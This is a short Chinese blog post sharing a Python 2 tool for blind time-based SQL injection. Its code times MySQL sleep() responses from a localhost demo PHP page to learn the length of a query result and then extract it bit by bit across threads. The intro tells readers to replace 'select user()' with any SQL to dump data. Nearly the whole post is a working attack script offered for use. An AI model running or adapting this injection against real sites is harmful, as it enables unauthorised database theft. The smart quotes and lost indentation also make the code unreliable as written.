python延迟注入

2015-09-13 17:20 • 网络安全 • 阅读 2498

如果要爆数据啥的话就改py代码里面的select%20user()，替换为你要执行的sql即可
[cc lang=”python”]
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
def __init__(self, str,x):
threading.Thread.__init__(self)
self.str = str
self.x = x
def run(self):
global res
x=self.x
j = self.str
url = “http://localhost/demo/1.php?username=root’+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29,” + str(x) + “,1%29%29%29,8,0%29,”+ str(j) + “,1%29%29,sleep%282%29,0%29%23″
html = request(url)
verify = ‘timeout’
if verify not in html:
res[str(j)] = 0
#print 1
else:
res[str(j)] = 1

def request(URL):
user_agent = { ‘User-Agent’ : ‘Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10’ }
req = urllib2.Request(URL, None, user_agent)
try:
request = urllib2.urlopen(req,timeout=2)
except Exception ,e:
time.sleep(2)
return ‘timeout’
return request.read()

def curl(url):
try:
start = time.clock()
requests.get(url)
end = time.clock()
return int(end)
except requests.RequestException as e:
print u”访问出错!”
exit()
def getLength():
i = 0
while True:
print “[+] Checking: %s \r” %i
url = “http://localhost/demo/1.php?username=root’+and+sleep(if(length((select%20user()))=”+ str(i) +”,1,0))%23″
html = request(url)
verify = ‘timeout’
if verify in html:
print u”[+] 数据长度为： %s” %i
return i

i = i + 1
def bin2dec(string_num):
return int(string_num, 2)

def getData(dataLength):
global res
data = “”
for x in range(dataLength):
x = x + 1
#print x
threads = []
for j in range(8):
result = “”
j = j + 1
sb = my_threading(j,x)
sb.setDaemon(True)
threads.append(sb)
#print j
for t in threads:
t.start()
for t in threads:
t.join()
#print res
tmp = “”
for i in range(8):
tmp = tmp + str(res[str(i+1)])
#print chr(bin2dec(tmp))
res = {}
result = chr(bin2dec(tmp))
print result
data = data + result
sb = None
print “[+] ok!”
print “[+] result:” + data